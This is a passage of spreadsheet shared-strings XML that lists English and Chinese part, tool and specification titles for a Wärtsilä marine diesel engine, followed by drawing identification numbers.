  <si>
    <t>SLUDGE OIL TRAP</t>
  </si>
  <si>
    <t>STARTING AIR SYSTEM</t>
  </si>
  <si>
    <t>VARIOUS INSTALLATION ITEMS</t>
  </si>
  <si>
    <t>FLUID VELOCITIES AND FLOW RATES</t>
  </si>
  <si>
    <t>Tool panel</t>
  </si>
  <si>
    <t>OMD CLEANING SET</t>
  </si>
  <si>
    <t>Crosshead pump(Wartsila Supply)</t>
  </si>
  <si>
    <t>MAT.-QUALITY INSTR. CYL LINER</t>
  </si>
  <si>
    <t>WARTSILA BASIC MATERIAL STANDARD</t>
  </si>
  <si>
    <t>PARTS SOURCING PROCEDURE</t>
  </si>
  <si>
    <t>QUALITY CODE</t>
  </si>
  <si>
    <t>EVALUATION/APPROVAL NEW SUPPLIER</t>
  </si>
  <si>
    <t>SENSITIVE PART LIST</t>
  </si>
  <si>
    <t>FITTING SPECIFICATION</t>
  </si>
  <si>
    <t>BALL VALVE SPECIFICATION</t>
  </si>
  <si>
    <t>MATERIAL CONVERSION TABLE</t>
  </si>
  <si>
    <t>PIPING GROUP-OVERVIEW</t>
  </si>
  <si>
    <t>PTFE MATERIAL SPECIFICATION</t>
  </si>
  <si>
    <t>GUIDELINE FOR ENGINE PROTECTION</t>
  </si>
  <si>
    <t>ENGINE ASSEMBLY RECORDS</t>
  </si>
  <si>
    <t>LIQUID SECURING AGENT SPEC.</t>
  </si>
  <si>
    <t>TIGHTENING INSTRUCTIONS</t>
  </si>
  <si>
    <t>PISTON CENTRING INSTRUCTIONS</t>
  </si>
  <si>
    <t>PISTON CENTRING</t>
  </si>
  <si>
    <t>LIQUID SEALING AGENT SPECIFICATION</t>
  </si>
  <si>
    <t>QUALITY/TEST SPEC./PRESS.PARTS</t>
  </si>
  <si>
    <t>CABLING INSTRUCTIONS</t>
  </si>
  <si>
    <t>PARTS ACCEPTANCE LIST</t>
  </si>
  <si>
    <t>MATERIAL SPECIFICATION LIST</t>
  </si>
  <si>
    <t>STANDARD ENGINE DATA</t>
  </si>
  <si>
    <t>GUIDELINES FOR ENGINE TUNING</t>
  </si>
  <si>
    <t>GUIDELINES</t>
  </si>
  <si>
    <t>PRINCIPAL DIMENSIONS AND WEIGHTS</t>
  </si>
  <si>
    <t>GLAND BOX</t>
  </si>
  <si>
    <t>FUEL INJECTION VALVE</t>
  </si>
  <si>
    <t>CRANKSHAFT</t>
  </si>
  <si>
    <t>BEARING SHELL CRANK PIN</t>
  </si>
  <si>
    <t>GEAR WHEEL 2-PARTS</t>
  </si>
  <si>
    <t>EXHAUST PIPE</t>
  </si>
  <si>
    <t>COMPENSATOR</t>
  </si>
  <si>
    <t>ENGINE CROSS SECTION</t>
  </si>
  <si>
    <t>NAME PLATES ENGINE CONTROL SYS.</t>
  </si>
  <si>
    <t>BEDPLATE ALIGNMENT</t>
  </si>
  <si>
    <t>WELD.SEQ.A.PL.SUBJ.T.MAT.VER.</t>
  </si>
  <si>
    <t>WELD.SEQ.A.PL.SUBJ.TO.MAT.VER.</t>
  </si>
  <si>
    <t>PIPE BRACKET 2-PARTS</t>
  </si>
  <si>
    <t>UPPER CASING</t>
  </si>
  <si>
    <t>LOWER CASING</t>
  </si>
  <si>
    <t>UPPER JOINT</t>
  </si>
  <si>
    <t>LOWER JOINT</t>
  </si>
  <si>
    <t>POST WELD HEAT TREATMENT (PWHT)</t>
  </si>
  <si>
    <t>INSULATION BANDAGE CYL. LINER</t>
  </si>
  <si>
    <t>CENTRING PIN</t>
  </si>
  <si>
    <t>RING TWO-PARTS</t>
  </si>
  <si>
    <t>LINING</t>
  </si>
  <si>
    <t>NEEDLE SEAT</t>
  </si>
  <si>
    <t>NEEDLE</t>
  </si>
  <si>
    <t>CONNECTING PIPE</t>
  </si>
  <si>
    <t>SPINDLE GUIDE</t>
  </si>
  <si>
    <t>INDICATOR VALVE COMB. CHAMBER</t>
  </si>
  <si>
    <t>INDICATOR VALVE</t>
  </si>
  <si>
    <t>FLYWHEEL PATTERNS</t>
  </si>
  <si>
    <t>GASKET 2-PARTS</t>
  </si>
  <si>
    <t>ORIFICE PLATE</t>
  </si>
  <si>
    <t>CAM ROLLER</t>
  </si>
  <si>
    <t>CAM PLATE</t>
  </si>
  <si>
    <t>ELASTIC STUD</t>
  </si>
  <si>
    <t>CONNECTION PISTON ROD/CROSSHEAD</t>
  </si>
  <si>
    <t>MAT.-QUAL.-A. TEST SPECIFICATION</t>
  </si>
  <si>
    <t>GUIDE SHOE MIDDLE-PART</t>
  </si>
  <si>
    <t>END COVER</t>
  </si>
  <si>
    <t>SPRAY NOZZLE</t>
  </si>
  <si>
    <t>PISTON RINGS</t>
  </si>
  <si>
    <t>LOWER LEVER</t>
  </si>
  <si>
    <t>PIPE SEAMLESS</t>
  </si>
  <si>
    <t>UPPER LEVER</t>
  </si>
  <si>
    <t>LOCKING WIRE</t>
  </si>
  <si>
    <t>INTERFACE SPECIFICATION</t>
  </si>
  <si>
    <t>BLOCK DIAGRAM</t>
  </si>
  <si>
    <t>FLEX SYSTEM INSTRUCTION</t>
  </si>
  <si>
    <t>FLEX SYSTEM INSTRUCTION INTERNAL</t>
  </si>
  <si>
    <t>DOCKTRIAL WITHOUT PROPELLER</t>
  </si>
  <si>
    <t>RUNNING-IN GUIDELINES TESTBED</t>
  </si>
  <si>
    <t>RUNNING-IN GUIDELINES SEATRIAL</t>
  </si>
  <si>
    <t>SHUT-DOWN UNIT TESTBED</t>
  </si>
  <si>
    <t>VALVE PLATE</t>
  </si>
  <si>
    <t>SHUT-DOWN UNIT</t>
  </si>
  <si>
    <t>AIR FILTER</t>
  </si>
  <si>
    <t>WALL PLATE</t>
  </si>
  <si>
    <t>SIDE WALL</t>
  </si>
  <si>
    <t>CONTROLLER CARD</t>
  </si>
  <si>
    <t>SHEET METAL</t>
  </si>
  <si>
    <t>INSIDE WALL</t>
  </si>
  <si>
    <t>PIPE SHORT</t>
  </si>
  <si>
    <t>THREADS- INSTRUCTION</t>
  </si>
  <si>
    <t>TENSION SLEEVE</t>
  </si>
  <si>
    <t>JOINT SET</t>
  </si>
  <si>
    <t>PLATFORM SUPPORT ARRANGEMENT</t>
  </si>
  <si>
    <t>UPPER PLATFORM</t>
  </si>
  <si>
    <t>CRANE RAIL</t>
  </si>
  <si>
    <t>RECTANGULAR HOLLOW SECTION</t>
  </si>
  <si>
    <t>LOWER PLATFORM</t>
  </si>
  <si>
    <t>LEAK OIL COLLECTOR</t>
  </si>
  <si>
    <t>STAY TUBE</t>
  </si>
  <si>
    <t>RAIL UNIT PLATFORM</t>
  </si>
  <si>
    <t>STAIRS</t>
  </si>
  <si>
    <t>ANGLE HOLDER</t>
  </si>
  <si>
    <t>PIPE CONNECTION PLAN</t>
  </si>
  <si>
    <t>FLANGE DIMENSIONS</t>
  </si>
  <si>
    <t>FIXED SUPPORT</t>
  </si>
  <si>
    <t>EXHAUST MANIFOLD-DEVELOPMENT</t>
  </si>
  <si>
    <t>COOLING WATER PIPE CYL. LINER</t>
  </si>
  <si>
    <t>CYLINDER COOLING WATER INLET</t>
  </si>
  <si>
    <t>COLLEC. MAIN CYL. COOLING WATER</t>
  </si>
  <si>
    <t>ALL-METAL HOSE</t>
  </si>
  <si>
    <t>CYLINDER COOLING WATER PIPE</t>
  </si>
  <si>
    <t>CYL. COOLING WATER PIPE OUTLET</t>
  </si>
  <si>
    <t>AIR SEPARATOR</t>
  </si>
  <si>
    <t>TROTTLING PIECE</t>
  </si>
  <si>
    <t>THROTTLING PIECE</t>
  </si>
  <si>
    <t>COOLING WATER DRAIN PIPE</t>
  </si>
  <si>
    <t>COOLING WATER PIPE</t>
  </si>
  <si>
    <t>CLAW COUPLING HOSE CONNECTION</t>
  </si>
  <si>
    <t>WASHING PLANT TC GAS INLET</t>
  </si>
  <si>
    <t>MALE ADAPTER UNION</t>
  </si>
  <si>
    <t>FLANGE ORIFICE</t>
  </si>
  <si>
    <t>WASHING PLANT TC DIRTY WATER OUTLET</t>
  </si>
  <si>
    <t>DRAINAGE PIPING</t>
  </si>
  <si>
    <t>LOW PRESS. 3-WAY DIV. BALL VALVE</t>
  </si>
  <si>
    <t>GASKET OVAL</t>
  </si>
  <si>
    <t>COLLECTOR MAIN TC DIRTY WATER</t>
  </si>
  <si>
    <t>PIPING</t>
  </si>
  <si>
    <t>FLOAT SWITCH HOUSING</t>
  </si>
  <si>
    <t>INSERT</t>
  </si>
  <si>
    <t>OIL PIPE INLET</t>
  </si>
  <si>
    <t>OIL PIPE BEARING DRIVE DE</t>
  </si>
  <si>
    <t>OIL PIPE TC INLET</t>
  </si>
  <si>
    <t>OIL PIPE TC OUTLET</t>
  </si>
  <si>
    <t>OIL DRAIN</t>
  </si>
  <si>
    <t>SUPPLY UNIT OIL FEED SYSTEM</t>
  </si>
  <si>
    <t>AUTOMATIC OIL FILTER</t>
  </si>
  <si>
    <t>PIPING PRESSURE CONTROL VALVE</t>
  </si>
  <si>
    <t>LEAK OIL DRAIN</t>
  </si>
  <si>
    <t>LEAK OIL COLLECTOR MAIN</t>
  </si>
  <si>
    <t>CYLINDER LUBRICATING OIL PIPE</t>
  </si>
  <si>
    <t>PIPE BEAM</t>
  </si>
  <si>
    <t>LEAK OIL OUTLET</t>
  </si>
  <si>
    <t>COLLEC MAIN LEAK OIL GLAND BOX</t>
  </si>
  <si>
    <t>PRESSURE RETAINING VALVE</t>
  </si>
  <si>
    <t>SPRING GUIDE</t>
  </si>
  <si>
    <t>PLAIN WASHER</t>
  </si>
  <si>
    <t>FUEL LEAKAGE PIPE RAIL UNIT</t>
  </si>
  <si>
    <t>WELDING FLANGE</t>
  </si>
  <si>
    <t>HIGH PRESSURE PIPE FUEL</t>
  </si>
  <si>
    <t>PRESSURE SWITCH PIPE</t>
  </si>
  <si>
    <t>MEASURING POINTS</t>
  </si>
  <si>
    <t>MEASURING INSTRUMENTS</t>
  </si>
  <si>
    <t>GROUND PLATE</t>
  </si>
  <si>
    <t>PRESSURE BOTTLE</t>
  </si>
  <si>
    <t>CLAMPING SLEEVE</t>
  </si>
  <si>
    <t>DRIVE SHAFT</t>
  </si>
  <si>
    <t>SUPPORT WITH OIL FUNNEL</t>
  </si>
  <si>
    <t>OIL MIST DETECTOR</t>
  </si>
  <si>
    <t>CONTROL/SAFETY BLOCK DIAGRAM</t>
  </si>
  <si>
    <t>CABLE LIST</t>
  </si>
  <si>
    <t>PISTON COOLING FLOW MONITORING</t>
  </si>
  <si>
    <t>FLOW DETECTOR</t>
  </si>
  <si>
    <t>DIFFERENTIAL PRESSURE SWITCH</t>
  </si>
  <si>
    <t>DAMPING ELEMENT</t>
  </si>
  <si>
    <t>ALARM BLOCK DIAGRAM</t>
  </si>
  <si>
    <t>REMOVAL AND FITTING OF CROSSHEAD</t>
  </si>
  <si>
    <t>ASSEMBL.AND DISMANTL. OF THE MOTOR</t>
  </si>
  <si>
    <t>ASSY AND DISMANTL./AXIAL DETUNER</t>
  </si>
  <si>
    <t>TOOL GENERAL LIFTING EYEBOLTS</t>
  </si>
  <si>
    <t>PRESSURE PLATE</t>
  </si>
  <si>
    <t>PLUG PIECE</t>
  </si>
  <si>
    <t>MANUAL RATCHET</t>
  </si>
  <si>
    <t>ROUND SLING</t>
  </si>
  <si>
    <t>TOOL BEDPLATE ALIGNMENT</t>
  </si>
  <si>
    <t>DEVIATION PIPE</t>
  </si>
  <si>
    <t>ASSY AND DISMANTLING DEVICE</t>
  </si>
  <si>
    <t>FITTING AND DISMANTLING TOOL</t>
  </si>
  <si>
    <t>LINK</t>
  </si>
  <si>
    <t>ARM</t>
  </si>
  <si>
    <t>ANGLE STEEL  SHARP EDGED</t>
  </si>
  <si>
    <t>MEASURING TOOL</t>
  </si>
  <si>
    <t>TOOL CYLINDER LINER GRINDING</t>
  </si>
  <si>
    <t>TENSIONING DEVICE</t>
  </si>
  <si>
    <t>DISTANCE ROLLER</t>
  </si>
  <si>
    <t>PREC TUBE SEAMLESS</t>
  </si>
  <si>
    <t>FITTED BOLT</t>
  </si>
  <si>
    <t>HOLDER TWO-PIECE</t>
  </si>
  <si>
    <t>GRINDING MACHINE</t>
  </si>
  <si>
    <t>AIR HOSE</t>
  </si>
  <si>
    <t>HOSE NOZZLE</t>
  </si>
  <si>
    <t>HOSE CLAMP</t>
  </si>
  <si>
    <t>AUTOMATIC LUBRICATOR</t>
  </si>
  <si>
    <t>THREAD NOZZLE</t>
  </si>
  <si>
    <t>CUTTER</t>
  </si>
  <si>
    <t>ROLLER SUPPORT</t>
  </si>
  <si>
    <t>TOOL CYL. COVER/EXH. VALVE ASSY.</t>
  </si>
  <si>
    <t>REMOVAL OF CYLINDER COVER</t>
  </si>
  <si>
    <t>INJECTOR TEST BENCH</t>
  </si>
  <si>
    <t>PRE-TENSIONING JACK</t>
  </si>
  <si>
    <t>ASSEMBLY AND DISMANTLING DEVICE</t>
  </si>
  <si>
    <t>UPPER RING TWO PARTS</t>
  </si>
  <si>
    <t>LOWER RING TWO PARTS</t>
  </si>
  <si>
    <t>VALVE PROTECTOR</t>
  </si>
  <si>
    <t>TOOL VALVE GRINDING AND DEVICE</t>
  </si>
  <si>
    <t>VALVE GRINDING MACINE</t>
  </si>
  <si>
    <t>ROTATION DEVICE</t>
  </si>
  <si>
    <t>TOOL CYLINDER PRESSURE MEASURING</t>
  </si>
  <si>
    <t>TOOL FLYWHEEL ASSEMBLY</t>
  </si>
  <si>
    <t>TOOL AXIAL DETUNER ASSEMBLY</t>
  </si>
  <si>
    <t>TOOL CONNECTING ROD PRE-TENSIONING</t>
  </si>
  <si>
    <t>COVER- AND LIFTINGPLATE</t>
  </si>
  <si>
    <t>RETAINING PIN</t>
  </si>
  <si>
    <t>LIFTING PIECE</t>
  </si>
  <si>
    <t>CONNECTING PIECE WITH FLANGE</t>
  </si>
  <si>
    <t>NUT PIECE</t>
  </si>
  <si>
    <t>TOOL PISTON ROD/CROSSHD. PRETENS</t>
  </si>
  <si>
    <t>TOOL CONNEC. ROD BEARING ASSY</t>
  </si>
  <si>
    <t>COVER 2-PARTS</t>
  </si>
  <si>
    <t>TOOL PISTON ROD SHIM ASSEMBLY</t>
  </si>
  <si>
    <t>SUPPORT PLATE</t>
  </si>
  <si>
    <t>ASSEMBLY TEMPLATE</t>
  </si>
  <si>
    <t>SHELL</t>
  </si>
  <si>
    <t>GUIDE SCREW</t>
  </si>
  <si>
    <t>CENTRING DEVICE</t>
  </si>
  <si>
    <t>YOKE</t>
  </si>
  <si>
    <t>ADJUSTING SCALE</t>
  </si>
  <si>
    <t>ADJUSTING SCREW</t>
  </si>
  <si>
    <t>LIFTING PLATE</t>
  </si>
  <si>
    <t>TROLLEY</t>
  </si>
  <si>
    <t>TOOL TC FAILURE</t>
  </si>
  <si>
    <t>TOOL EXHAUST MANIFOLD ASSEMBLY</t>
  </si>
  <si>
    <t>SCREW-ON SLEEVE</t>
  </si>
  <si>
    <t>SPARE PARTS ENGINE CONTROL SYS.</t>
  </si>
  <si>
    <t>SPARE PARTS ALARM SYSTEM</t>
  </si>
  <si>
    <t>TOOL PANELS</t>
  </si>
  <si>
    <t>Engine coupling flywheel casing</t>
  </si>
  <si>
    <t>FLYWHEEL GUARD</t>
  </si>
  <si>
    <t>LUBRICATING OIL SYSTEM</t>
  </si>
  <si>
    <t>LUBRICATING OIL DRAIN TANK</t>
  </si>
  <si>
    <t>Vertical oil drain</t>
  </si>
  <si>
    <t>RUBBER GASKET</t>
  </si>
  <si>
    <t>LEAKAGE COLLECT./ WASHING SYSTEM</t>
  </si>
  <si>
    <t>CYLINDER JACKET</t>
  </si>
  <si>
    <t>NOZZLE BODY WITH NEEDLE</t>
  </si>
  <si>
    <t>CYLINDER LUBRICATING PUMP</t>
  </si>
  <si>
    <t>AXLE</t>
  </si>
  <si>
    <t>GRID</t>
  </si>
  <si>
    <t>FIT BOLT</t>
  </si>
  <si>
    <t>RING SEGMENT</t>
  </si>
  <si>
    <t>CARDAN ROD</t>
  </si>
  <si>
    <t>HUB</t>
  </si>
  <si>
    <t>ASSY AND DISMANTLING/ FLG MOTOR</t>
  </si>
  <si>
    <t>通用工具-组合扳手</t>
  </si>
  <si>
    <t>通用工具-开口扳手</t>
  </si>
  <si>
    <t>通用工具-冲击扳手</t>
  </si>
  <si>
    <t>通用工具-扳手</t>
  </si>
  <si>
    <t>扳手</t>
  </si>
  <si>
    <t>通用工具-杆</t>
  </si>
  <si>
    <t>杆</t>
  </si>
  <si>
    <t>套筒扳手</t>
  </si>
  <si>
    <t>通用工具-专用钳子</t>
  </si>
  <si>
    <t>通用工具-拔销装置</t>
  </si>
  <si>
    <t>拔销装置</t>
  </si>
  <si>
    <t>衬套</t>
  </si>
  <si>
    <t>六角螺母</t>
  </si>
  <si>
    <t>垫片</t>
  </si>
  <si>
    <t>凸缘螺母</t>
  </si>
  <si>
    <t>通用工具-千斤顶/泵</t>
  </si>
  <si>
    <t>液压千斤顶和泵</t>
  </si>
  <si>
    <t>液压装置</t>
  </si>
  <si>
    <t>专用接头</t>
  </si>
  <si>
    <t>快速接头</t>
  </si>
  <si>
    <t>高压活塞泵</t>
  </si>
  <si>
    <t>液压千斤顶</t>
  </si>
  <si>
    <t>接头</t>
  </si>
  <si>
    <t>截止阀</t>
  </si>
  <si>
    <t>铭牌</t>
  </si>
  <si>
    <t>柔性软管</t>
  </si>
  <si>
    <t>软管</t>
  </si>
  <si>
    <t>分配器</t>
  </si>
  <si>
    <t>压力表</t>
  </si>
  <si>
    <t>液压分配器</t>
  </si>
  <si>
    <t>带槽密封圈</t>
  </si>
  <si>
    <t>排油管</t>
  </si>
  <si>
    <t>管夹</t>
  </si>
  <si>
    <t>通用工具-润滑注油枪</t>
  </si>
  <si>
    <t>高压注油枪</t>
  </si>
  <si>
    <t>通用工具-扭力扳手</t>
  </si>
  <si>
    <t>扭力扳手</t>
  </si>
  <si>
    <t>六角头接杆</t>
  </si>
  <si>
    <t>接长杆</t>
  </si>
  <si>
    <t>压力测量工具</t>
  </si>
  <si>
    <t>箱体</t>
  </si>
  <si>
    <t>高压泵</t>
  </si>
  <si>
    <t>螺纹接头</t>
  </si>
  <si>
    <t>高压软管</t>
  </si>
  <si>
    <t>调整工具</t>
  </si>
  <si>
    <t>测量接头</t>
  </si>
  <si>
    <t>开口扭力扳手</t>
  </si>
  <si>
    <t>专用吊具</t>
  </si>
  <si>
    <t>吊环螺栓</t>
  </si>
  <si>
    <t>吊环</t>
  </si>
  <si>
    <t>标签</t>
  </si>
  <si>
    <t>吊钩</t>
  </si>
  <si>
    <t>拆卸工具</t>
  </si>
  <si>
    <t>专用螺钉</t>
  </si>
  <si>
    <t>专用螺母</t>
  </si>
  <si>
    <t>主轴承安装工具</t>
  </si>
  <si>
    <t>轴瓦的拆卸</t>
  </si>
  <si>
    <t>支座</t>
  </si>
  <si>
    <t>板</t>
  </si>
  <si>
    <t>套</t>
  </si>
  <si>
    <t>钢丝绳</t>
  </si>
  <si>
    <t>卸扣</t>
  </si>
  <si>
    <t>方钢</t>
  </si>
  <si>
    <t>安装和拆卸</t>
  </si>
  <si>
    <t>扁钢</t>
  </si>
  <si>
    <t>销</t>
  </si>
  <si>
    <t>弹簧夹</t>
  </si>
  <si>
    <t>液轮</t>
  </si>
  <si>
    <t>吊具螺栓</t>
  </si>
  <si>
    <t>管</t>
  </si>
  <si>
    <t>管子规范</t>
  </si>
  <si>
    <t>肋板</t>
  </si>
  <si>
    <t>轴承盖的拆卸</t>
  </si>
  <si>
    <t>吊具</t>
  </si>
  <si>
    <t>滑车</t>
  </si>
  <si>
    <t>主轴承测量工具</t>
  </si>
  <si>
    <t>塞尺</t>
  </si>
  <si>
    <t>带盒深度尺</t>
  </si>
  <si>
    <t>带盒厚薄规</t>
  </si>
  <si>
    <t>轴承塞尺</t>
  </si>
  <si>
    <t>主轴承预紧拉伸器</t>
  </si>
  <si>
    <t>双头预紧拉伸器</t>
  </si>
  <si>
    <t>双油缸</t>
  </si>
  <si>
    <t>活塞</t>
  </si>
  <si>
    <t>圆螺母</t>
  </si>
  <si>
    <t>放气螺钉</t>
  </si>
  <si>
    <t>支撑环</t>
  </si>
  <si>
    <t>O型圈</t>
  </si>
  <si>
    <t>工具箱</t>
  </si>
  <si>
    <t>梁</t>
  </si>
  <si>
    <t>推力块</t>
  </si>
  <si>
    <t>螺母</t>
  </si>
  <si>
    <t>螺栓</t>
  </si>
  <si>
    <t>主轴瓦安装工具</t>
  </si>
  <si>
    <t>工子梁</t>
  </si>
  <si>
    <t>地脚螺栓预紧拉伸器</t>
  </si>
  <si>
    <t>液压拉伸器</t>
  </si>
  <si>
    <t>缸体</t>
  </si>
  <si>
    <t>工具-机架工作踏板</t>
  </si>
  <si>
    <t>机架工作踏板</t>
  </si>
  <si>
    <t>框架</t>
  </si>
  <si>
    <t>角钢</t>
  </si>
  <si>
    <t>安装板</t>
  </si>
  <si>
    <t>贯穿螺栓预紧拉伸器</t>
  </si>
  <si>
    <t>缸套安装工具</t>
  </si>
  <si>
    <t>安装块</t>
  </si>
  <si>
    <t>螺钉</t>
  </si>
  <si>
    <t>定距板</t>
  </si>
  <si>
    <t>缸套测量工具</t>
  </si>
  <si>
    <t>内经千分尺</t>
  </si>
  <si>
    <t>焊座</t>
  </si>
  <si>
    <t>填料函安装工具</t>
  </si>
  <si>
    <t>槽钢</t>
  </si>
  <si>
    <t>样板</t>
  </si>
  <si>
    <t>卡环</t>
  </si>
  <si>
    <t>两半式卡环</t>
  </si>
  <si>
    <t>安装工具</t>
  </si>
  <si>
    <t>无缝钢管</t>
  </si>
  <si>
    <t>圆钢</t>
  </si>
  <si>
    <t>起吊装置</t>
  </si>
  <si>
    <t>喷油器研磨工具</t>
  </si>
  <si>
    <t>刀架</t>
  </si>
  <si>
    <t>成型刀</t>
  </si>
  <si>
    <t>调节螺钉</t>
  </si>
  <si>
    <t>喷油器试验台</t>
  </si>
  <si>
    <t>喷射试验装置</t>
  </si>
  <si>
    <t>阀支座</t>
  </si>
  <si>
    <t>液压缸</t>
  </si>
  <si>
    <t>方管</t>
  </si>
  <si>
    <t>手柄</t>
  </si>
  <si>
    <t>排气阀壳液压拉伸器</t>
  </si>
  <si>
    <t>排气阀座安装工具</t>
  </si>
  <si>
    <t>半环</t>
  </si>
  <si>
    <t>压块</t>
  </si>
  <si>
    <t>阀座加工工具</t>
  </si>
  <si>
    <t>说明板</t>
  </si>
  <si>
    <t>阀杆修磨工具</t>
  </si>
  <si>
    <t>GRINDING TOOL FOR VALVE SPINDLE</t>
  </si>
  <si>
    <t>规范</t>
  </si>
  <si>
    <t>备件清单</t>
  </si>
  <si>
    <t>定位销</t>
  </si>
  <si>
    <t>REFERENCE SHEET</t>
  </si>
  <si>
    <t>参考表</t>
  </si>
  <si>
    <t>喷油器防护工具</t>
  </si>
  <si>
    <t>护罩</t>
  </si>
  <si>
    <t>精密无缝钢管</t>
  </si>
  <si>
    <t>调节垫片</t>
  </si>
  <si>
    <t>曲轴测量工具</t>
  </si>
  <si>
    <t>定距套</t>
  </si>
  <si>
    <t>连杆和十字头安装工具</t>
  </si>
  <si>
    <t>带卸扣的钢丝绳</t>
  </si>
  <si>
    <t>环</t>
  </si>
  <si>
    <t>中心块</t>
  </si>
  <si>
    <t>把手</t>
  </si>
  <si>
    <t>连杆安装工具</t>
  </si>
  <si>
    <t>圆板</t>
  </si>
  <si>
    <t>连杆轴承检查工具</t>
  </si>
  <si>
    <t>档板</t>
  </si>
  <si>
    <t>活塞安装工具</t>
  </si>
  <si>
    <t>活塞支架</t>
  </si>
  <si>
    <t>加强板</t>
  </si>
  <si>
    <t>插入椎管</t>
  </si>
  <si>
    <t>锥管</t>
  </si>
  <si>
    <t>制动夹</t>
  </si>
  <si>
    <t>安装和拆卸装置</t>
  </si>
  <si>
    <t>提升装置上部件</t>
  </si>
  <si>
    <t>侧板</t>
  </si>
  <si>
    <t>活塞测量工具</t>
  </si>
  <si>
    <t>警告牌</t>
  </si>
  <si>
    <t>顶丝</t>
  </si>
  <si>
    <t>丝锥</t>
  </si>
  <si>
    <t>活塞环安装工具</t>
  </si>
  <si>
    <t>活塞环张力调整装置</t>
  </si>
  <si>
    <t>夹紧块</t>
  </si>
  <si>
    <t>T形钢</t>
  </si>
  <si>
    <t>螺杆</t>
  </si>
  <si>
    <t>导套</t>
  </si>
  <si>
    <t>伸出轴</t>
  </si>
  <si>
    <t>中间齿轮安装工具</t>
  </si>
  <si>
    <t>供油单元安装工具</t>
  </si>
  <si>
    <t>装配模板</t>
  </si>
  <si>
    <t>壳</t>
  </si>
  <si>
    <t>焊接块</t>
  </si>
  <si>
    <t>滚轮吊装工具</t>
  </si>
  <si>
    <t>弹簧导杆</t>
  </si>
  <si>
    <t>丝杠</t>
  </si>
  <si>
    <t>档圈</t>
  </si>
  <si>
    <t>对中装置</t>
  </si>
  <si>
    <t>限位块</t>
  </si>
  <si>
    <t>盖布置</t>
  </si>
  <si>
    <t>燃油泵安装工具</t>
  </si>
  <si>
    <t>轭</t>
  </si>
  <si>
    <t>阀杆</t>
  </si>
  <si>
    <t>固定螺钉</t>
  </si>
  <si>
    <t>钢丝挡圈</t>
  </si>
  <si>
    <t>检查块</t>
  </si>
  <si>
    <t>调整块</t>
  </si>
  <si>
    <t>刻度盘</t>
  </si>
  <si>
    <t>调整螺钉</t>
  </si>
  <si>
    <t>共轨单元安装工具</t>
  </si>
  <si>
    <t>面板</t>
  </si>
  <si>
    <t>盲法兰</t>
  </si>
  <si>
    <t>密封件</t>
  </si>
  <si>
    <t>试验规范（无损探伤实验）</t>
  </si>
  <si>
    <t>实验规范（硬度实验）</t>
  </si>
  <si>
    <t>封盖</t>
  </si>
  <si>
    <t>供应单元运输</t>
  </si>
  <si>
    <t>辅助鼓风机安装工具</t>
  </si>
  <si>
    <t>圆形吊带</t>
  </si>
  <si>
    <t>空冷器安装工具</t>
  </si>
  <si>
    <t>CHARGE AIR COOLER SUPPORT</t>
  </si>
  <si>
    <t>空冷器支撑</t>
  </si>
  <si>
    <t>防护帽</t>
  </si>
  <si>
    <t>吊装设备</t>
  </si>
  <si>
    <t>RIB PLATE</t>
  </si>
  <si>
    <t>充氮工具</t>
  </si>
  <si>
    <t>减压阀</t>
  </si>
  <si>
    <t>控制单元</t>
  </si>
  <si>
    <t>液压管修磨工具</t>
  </si>
  <si>
    <t>空气管失效工具</t>
  </si>
  <si>
    <t>高压油管研磨工具</t>
  </si>
  <si>
    <t>螺钉固定套</t>
  </si>
  <si>
    <t>模具</t>
  </si>
  <si>
    <t>SW-下载包</t>
  </si>
  <si>
    <t>软件工具</t>
  </si>
  <si>
    <t>带电缆插头订货图</t>
  </si>
  <si>
    <t>插入接头</t>
  </si>
  <si>
    <t>FUEL QUANTITY SENSOR</t>
  </si>
  <si>
    <t>COVER PLATE FOR TERMINAL BOXES</t>
  </si>
  <si>
    <t>DRAWING-ID</t>
  </si>
  <si>
    <t>DAAD015320</t>
  </si>
  <si>
    <t>DAAD015860</t>
  </si>
  <si>
    <t>107.363.286</t>
  </si>
  <si>
    <t>107.379.366</t>
  </si>
  <si>
    <t>107.046.361</t>
  </si>
  <si>
    <t>107.048.720</t>
  </si>
  <si>
    <t>107.379.381</t>
  </si>
  <si>
    <t>W5000017</t>
  </si>
  <si>
    <t>DAAD900839</t>
  </si>
  <si>
    <t>DAAD900844</t>
  </si>
  <si>
    <t>107.343.778</t>
  </si>
  <si>
    <t>107.143.790</t>
  </si>
  <si>
    <t>107.221.083</t>
  </si>
  <si>
    <t>107.399.738</t>
  </si>
  <si>
    <t>107.328.520</t>
  </si>
  <si>
    <t>107.380.159</t>
  </si>
  <si>
    <t>107.315.749</t>
  </si>
  <si>
    <t>W5010022</t>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>107.346.968</t>
  </si>
  <si>
    <t>107.075.301</t>
  </si>
  <si>
    <t>107.385.946</t>
  </si>
  <si>
    <t>DAAD014842</t>
  </si>
  <si>
    <t>W5010041</t>
  </si>
  <si>
    <t>107.412.177</t>
  </si>
  <si>
    <t>107.369.417</t>
  </si>
  <si>
    <t>107.344.732</t>
  </si>
  <si>
    <t>107.114.070</t>
  </si>
  <si>
    <t>107.369.730</t>
  </si>
  <si>
    <t>107.344.862</t>
  </si>
  <si>
    <t>107.347.009</t>
  </si>
  <si>
    <t>107.284.177</t>
  </si>
  <si>
    <t>107.200.573</t>
  </si>
  <si>
    <t>107.217.359</t>
  </si>
  <si>
    <t>107.393.051</t>
  </si>
  <si>
    <t>107.429.665</t>
  </si>
  <si>
    <t>107.297.442</t>
  </si>
  <si>
    <t>107.429.501</t>
  </si>
  <si>
    <t>107.392.583</t>
  </si>
  <si>
    <t>107.318.794</t>
  </si>
  <si>
    <t>107.299.542</t>
  </si>
  <si>
    <t>107.318.020</t>
  </si>
  <si>
    <t>107.409.648</t>
  </si>
  <si>
    <t>107.385.952</t>
  </si>
  <si>
    <t>107.253.345</t>
  </si>
  <si>
    <t>107.427.450</t>
  </si>
  <si>
    <t>107.132.537</t>
  </si>
  <si>
    <t>107.270.909</t>
  </si>
  <si>
    <t>107.296.278</t>
  </si>
  <si>
    <t>DAAD022883</t>
  </si>
  <si>
    <t>107.295.106</t>
  </si>
  <si>
    <t>DAAD034259</t>
  </si>
  <si>
    <t>DAAD013761</t>
  </si>
  <si>
    <t>107.357.716</t>
  </si>
  <si>
    <t>DAAD012681</t>
  </si>
  <si>
    <t>DAAD005729</t>
  </si>
  <si>
    <t>DAAD005728</t>
  </si>
  <si>
    <t>DAAD005920</t>
  </si>
  <si>
    <t>107.274.182</t>
  </si>
  <si>
    <t>DAAD006647</t>
  </si>
  <si>
    <t>107.387.747</t>
  </si>
  <si>
